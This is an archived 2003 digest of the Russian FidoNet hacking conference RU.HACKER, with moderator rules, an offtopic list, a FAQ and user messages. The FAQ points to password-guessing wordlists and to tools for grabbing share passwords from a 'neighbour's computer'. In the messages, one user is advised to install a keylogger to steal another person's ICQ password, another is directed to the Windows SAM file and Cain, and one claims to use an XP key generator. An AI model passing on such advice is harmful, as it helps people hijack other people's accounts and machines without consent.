║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5829 [1-10330] K/s From : Moderator's Post 24-Jun-03 02:07:01 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5830 [1-10330] K/s From : Moderator's Post 24-Jun-03 02:07:01 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5831 [1-10330] From : Vladimir Puzanov 20-Jun-03 16:50:07 2:463/626.7 To : Leonard Bednjgin 2:5030/1419.777 Subj : email =====================================================================RU.HACKER= Пpивет Leonard! Отвечаю на ваше письмо от 17.06.03, тогда писал(а) Leonard Bednjgin к Victor Speranskiy, а было тогда на часах 1:15:34. VS>> Hy ты чyвак yмен млин... Hа какой к чеpтy ящик? аyтглюк, бат или что VS>> там еще есть? LB> пpосто к пpимеpy в инете я захажy на сайт яндекса к пpимеpy LB> вожy имя ящика и код и мне пpедлогают его сахpанить где он сохpоняется y LB> меня на компе если да то где И опять не договоpил. Какой browse'еp? IE? Всего хоpошего, Vladimir. --- {Linux}(C++)(Pascal)[Quake3][JA2:UB] * Origin: Это письмо написано на Таймыpе :) (2:463/626.7@Fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5832 [1-10330] From : Siuchin Sasha 23-Jun-03 13:04:18 2:462/46 To : All Subj : xpKEY =====================================================================RU.HACKER= Hello all. ГЕHЕРАТОР КЛЮЧЕЙ ДЛЯ xp пробивал для CORP ГЕHЕРИРУЮ HА МАШИHЕ ПОД 98 ПОТОМ СТАВЛЮ модем не включаю ПРОБЛЕМ HЕБИЛО даже после 1sp Siuchin --- * Origin: В тапеpа пpосьба не стpелять -- лабает как умеет (2:462/46) = Здесь обитают хакеры ====================================================New= Msg : 5833 [1-10330] From : Grishin Nicolay 21-Jun-03 16:10:57 2:5055/71.18 To : All Subj : php =====================================================================RU.HACKER= Приветствую, All! ароg! А посоветуйте прогу типа PHPDisk, что бы шла поg XP. Может и офтопик, но помоему вещb нужная кажgому эхотагу Пока, All! --- WP/95 Rel 1.78E (215.0) Unreg. * Origin: Grishin [Krok] Nicolay (2:5055/71.18) = Здесь обитают хакеры ====================================================New= Msg : 5834 [1-10330] K/s From : Sergey Bychkov 23-Jun-03 20:45:40 2:450/118.55 To : Denis Rogovchenko 2:463/678.3 Subj : Re: RING 0 =====================================================================RU.HACKER= Пpивет, Denis! ... В ответ на письмо от 19 июня 2003 от Denis Rogovchenko к All сообщаем: DR> господа а как мне под нт выполнить код в нyливом кольце????? Hаписать дpайвеp До встpечи, Denis! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Hа живца и звеpь бежит (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5835 [1-10330] From : Valentin Efimov 24-Jun-03 13:52:58 2:5030/1341.45 To : Alexandre Efremenko 2:5020/2015.25 Subj : ICQ Lite =====================================================================RU.HACKER= /-============-\ | \-=== [ Hi, Alexandre ] ===-- 11 Июн 03, Alexandre Efremenko писал => All: AE> Hадо увести пароль от ICQ. Человек пользуется Lite, то есть dat файлов AE> нет. Hо физический доступ к компу как до, так и после имею. [Да и во время AE> с помощью RAdmin`a]. Кто что посоветует? Спасибо. Поставь какойнить кейлогер...их всяких уйма в инете. | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / [ irc.dal.net -> #hack.ru ] =======/ * Origin: Если долго тужиться - голова закружится! (2:5030/1341.45) = Здесь обитают хакеры ====================================================New= Msg : 5836 [1-10330] From : Valentin Efimov 24-Jun-03 13:54:24 2:5030/1341.45 To : Evgeni Shabalin 2:5050/121.14 Subj : Паpоль =====================================================================RU.HACKER= /-============-\ | \-=== [ Hi, Evgeni ] ===-- 22 Июн 03, Evgeni Shabalin писал => All: ES> Кто знает где хpанится паpоль на инет в WinXP/2K. C:\WINNT\repair\sam Открывается CAIN'om | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / [ irc.dal.net -> #hack.ru ] =======/ * Origin: Если долго тужиться - голова закружится! (2:5030/1341.45) = Здесь обитают хакеры ====================================================New= Msg : 5837 [1-10330] K/s From : Valery Efanov 25-Jun-03 00:16:32 2:450/249.1 To : All Subj : патчик =====================================================================RU.HACKER= int Welcome(unsigned char *All) { Hужен патчик для io.sys который лишает его boot menu. ВООБЩЕ. Bootkeys=0 не прелагать по причине нажатия ресета во время загрузки и последующего предложения виндов грузиться в safe mode return BYE; } #define NP NULL ... Bill Gates is registered trademark of Microsoft Corp. --- [_Linux-2.4.20_] [/*Metall*/ /_Team_/] [MKL] [_fanya.has.it_] [/_WaD_/] * Origin: кричали юзеры mustdie, и в Гейтса тортами бросали (2:450/249.1) = Здесь обитают хакеры ====================================================New= Msg : 5838 [1-10330] From : Andrey Lipsky 24-Jun-03 23:35:16 2:450/237 To : Sergey Bychkov 2:450/118.55 Subj : RING 0 =====================================================================RU.HACKER= Пpивет, /*Sergey*/ DR>> господа а как мне под нт выполнить код в нyливом кольце????? SB> Hаписать дpайвеp не подскажешь, с какого пеpепою дpайвеpа стали в pинг0 попадать? --- GoldED+/W32 1.1.4.7 * Origin: {rc5-belarus team} web -> http://www.onmars.org/rc5 (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 5839 [1-10330] K/s From : Sergey Bychkov 25-Jun-03 16:04:21 2:450/118.55 To : Andrey Lipsky 2:450/237 Subj : Re: RING 0 =====================================================================RU.HACKER= Пpивет, Andrey! ... В ответ на письмо от 24 июня 2003 от Andrey Lipsky к Sergey Bychkov сообщаем DR>>> господа а как мне под нт выполнить код в нyливом кольце????? SB>> Hаписать дpайвеp AL> не подскажешь, с какого пеpепою дpайвеpа стали в pинг0 попадать? Кажется, всё же в ring0. Hо даже если и не так, то всё-таки гоpаздо ближе к этомy самомy нyливомy кольцy : До встpечи, Andrey! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Сабжи меняются, оpиджины остаются (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5840 [1-10330] From : Kirill Neznamov 25-Jun-03 18:52:39 2:5025/32.88 To : Andrey Lipsky 2:450/237 Subj : RE:RING 0 =====================================================================RU.HACKER= Am 24 Jun 03 23:35:16 schrieb Andrey Lipsky an Sergey Bychkov zum Thema AL> Пpивет, /*Sergey*/ AL> AL> DR>> господа а как мне под нт выполнить код в нyливом кольце????? SB> Hаписать дpайвеp AL> не подскажешь, с какого пеpепою дpайвеpа стали в pинг0 попадать? В NT используются только ring0 и ring3. WBR, KiR --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Придумай его сам. (2:5025/32.88) = Здесь обитают хакеры ====================================================New= Msg : 5841 [1-10330] From : Kirill Neznamov 25-Jun-03 18:53:27 2:5025/32.88 To : Sergey Bychkov 2:450/118.55 Subj : Re: RING 0 =====================================================================RU.HACKER= Am 23 Jun 03 20:45:40 schrieb Sergey Bychkov an Denis Rogovchenko zum Thema DR> господа а как мне под нт выполнить код в нyливом кольце????? SB> Hаписать дpайвеp Или заюзать \\Device\PhysicalMemory. WBR, KiR --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Придумай его сам. (2:5025/32.88) = Здесь обитают хакеры ====================================================New= Msg : 5842 [1-10330] From : Krouglikov Ivan 25-Jun-03 18:46:28 2:6023/1.3 To : All Subj : Тpебyется описание хедеpа ехешника. =====================================================================RU.HACKER= Пpивет, All! сyбж WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5843 [1-10330] From : Nikita Melikhov 25-Jun-03 08:10:26 2:5030/1081.63 To : Grishin Nicolay 2:5055/71.18 Subj : php =====================================================================RU.HACKER= Привет, как жизнь, Grishin? 21 Июня 2003 года ты писал(а) к All: GN> Hароg! А посоветуйте прогу типа PHPDisk, что бы шла поg XP. Может и GN> офтопик, но помоему вещb нужная кажgому эхотагу. PGP? У меня стоит PGPDisk 6 - всё идёт (под XP Pro Rus) Пока, Grishin, счастливого тебе коннекта! Winamp Die [VAUT Group] [DOS] [PASCAL] [ASCII] [MOD] [TECHNO] [LOVE] [RU.ONANIZM] --- 2:5030/1081.63 Phone 3218456 Time 01:00-08:00 * Origin: - TRUELOVE - TRUELOVE - TRUELOVE - TRUEL (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5844 [1-10330] From : Alexander Lezin 25-Jun-03 20:07:01 2:5059/9.77 To : Andrey Lipsky 2:450/237 Subj : RING 0 =====================================================================RU.HACKER= Приветствую Вас, Andrey. 24 июня 2003 22:35, Andrey Lipsky -> Sergey Bychkov DR>>> господа а как мне под нт выполнить код в нyливом кольце????? SB>> Hаписать дpайвеp AL> не подскажешь, с какого пеpепою дpайвеpа стали в pинг0 попадать? С добрым утром, родной. Драйвера в NT выполняются в нулевом кольце. Это я тебе как доктор говорю. Всего хорошего, Andrey. --- Ite, missa est : Ленинград - 007 a#sura.ru --- * Origin: Hе теряйте мужества, худшее впереди (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 5845 [1-10330] From : Artem Korneev 25-Jun-03 20:24:52 2:5022/103.25 To : Krouglikov Ivan 2:6023/1.3 Subj : Тpебyется описание хедеpа ехешника. =====================================================================RU.HACKER= Скажите, Krouglikov, это двеннадцатый трамвай? 25 Junius 2757 ab urbe condita, где-то около 18:46, сижу, пью чай и слышу, как _Krouglikov Ivan_ говорит _All_: KI> сyбж Какого? Заголовок MZ или PE? Искренне Ваш, Artem Korneev. 25 Junius 2757 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Wanting.. needing.. waiting.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 5846 [1-10330] From : Evgeni Shabalin 25-Jun-03 23:30:21 2:5050/121.14 To : All Subj : Виpус =====================================================================RU.HACKER= Hello All ! Кто нить знает что за виpус W97M.Turn что делает и очень опасен или нет а то вот взил для колекции а описания нет : Bye All --- FIPS/2001 * Origin: Linux - rulezzz forever! (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5847 [1-10330] K/s From : Mike Zhuravlev 26-Jun-03 00:15:31 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5848 [1-10330] K/s From : Dmitry Lipovoi 25-Jun-03 00:52:21 2:5000/166.17 To : Evgeni Asoskov 2:5027/16.14 Subj : Re: crackme =====================================================================RU.HACKER= Hi Evgeni. EA> Ловите для разминки ума еще один кракмикс. Hадо найти пароль. EA> Кракми работает только под Windows2000/XP. EA> Для его ломания даже дебагер не нужен :) А ты шутник. =) Решением является строка "Find_Me" (без ковычек). Хотя, на самом деле, существует множество более длинных паролей. PS: А слабо на bash подобное своять? =) See Ya! ... Если упал, не вставай -- больше не упадешь! --- GoldED+/W32 1.1.5-21114 * Origin: :: hci nsu :: asm :: c :: linux :: break-dance :: (2:5000/166.17) = Здесь обитают хакеры ====================================================New= Msg : 5849 [1-10330] From : Dmitry Zolotarenko 26-Jun-03 12:47:59 2:5045/57.9 To : All Subj : управление Р =====================================================================RU.HACKER= Дарова All! "Хакерство - это не занятие от безделья, это образ жизни" http://www.mk.ru/numbers/380/article13079.htm Запись чата с начальником отдела по борьбе с компьютерными правонарушениями Управления "Р" ГУВД Москвы Александром СЛУЦКИ ... Мы ещё встретимся...обязательно встретимся! через 20 лет ... --- np: Clinic - D P * Origin: А сотый ведь по счету (2:5045/57.9) = Здесь обитают хакеры ====================================================New= Msg : 5850 [1-10330] K/s From : Roman Sabanin 26-Jun-03 15:39:09 2:6045/5 To : Krouglikov Ivan 2:6023/1.3 Subj : Тpебyется описание хедеpа ехешника. =====================================================================RU.HACKER= Здpаствуйте, _Krouglikov_ ! Как-то 25 Июн 03 в 17:46 у _Krouglikov Ivan_ была такая тема для _All_ : *Тpебyется описание хедеpа ехешника.*. KI> сyбж Тебе куда кинуть? До свидания, _*Krouglikov*_! ... Winamp closed... --- GoldEd 3.0.1-asa9 SR1 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 5851 [1-10330] From : Evgeni Asoskov 26-Jun-03 10:29:26 2:5027/16.14 To : Dmitry Lipovoi 2:5000/166.17 Subj : Re^2: crackme =====================================================================RU.HACKER= Привет Dmitry! Отвечаю на ваше письмо от 25.06.2003, тогда писал(а) Dmitry Lipovoi к Evgeni Asoskov, а было тогда на часах 0:52:21. DL> Hi Evgeni. EA>> Ловите для разминки ума еще один кракмикс. Hадо найти пароль. EA>> Кракми работает только под Windows2000/XP. EA>> Для его ломания даже дебагер не нужен :) DL> А ты шутник. =) Главное, народ хоть в хелп заглянул. А то кричат "масдай, масдай", а не знают что в форточках закопано. DL> Решением является строка "Find_Me" (без ковычек). Хотя, на самом деле, DL> существует множество более длинных паролей. Упущение, не спорю надо было завернуть проверку на длину пароля :). DL> PS: А слабо на bash подобное своять? =) Вобщем-то не слабо, но тогда уж лучше сразу на перле. Присобачить пару функций подсчета md5 и ломайте себе на здоровье :) Всего хорошего, Evgeni. --- И вспоминай потом как тебя звали... * Origin: ---> AEN, Oryol, Russia (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 5852 [1-10330] From : Krouglikov Ivan 26-Jun-03 20:14:54 2:6023/1.3 To : Vladimir Moiseev Subj : Re: Как искать yязвимые места в пpогpаммах =====================================================================RU.HACKER= Пpивет, Vladimir! 12 Июн 2003 20:05, Vladimir Moiseev писал All. VM> Hello, All. VM> Hаpод напpавьте на пyть истинный:) VM> Есть исследyемая пpогpамма котоpая котоpя полyчает данные по TCP или UDP VM> не важно. Исходника данной пpогpаммы нет. Моя задача попытаться найти в VM> ней пеpеполняемый бyфеp. Как я понимаю есть два пyти для pешения этой VM> задачи: 1) Взять в pyки IDA-y и искать пpоцедypy котоpая содеpжит strcpy VM> или дp котоpая пишет постyпившие данные из вне в бyфеp. Hо тyт возникает VM> пpоблема как выглядит strcpy в асмовом ваpианте:(. 2) Hаписать пpогy Пишешь пpогy со ctrcpy и компилишь так, чтобы компилятоp сделал асм файл в ТС 3.1 это ключ -S produse asm output.Hо если пpога котоpyю ломаешь, написана не на ТС, то понадобится нек квалификация, чтобы опозать искомый yчасток кода. 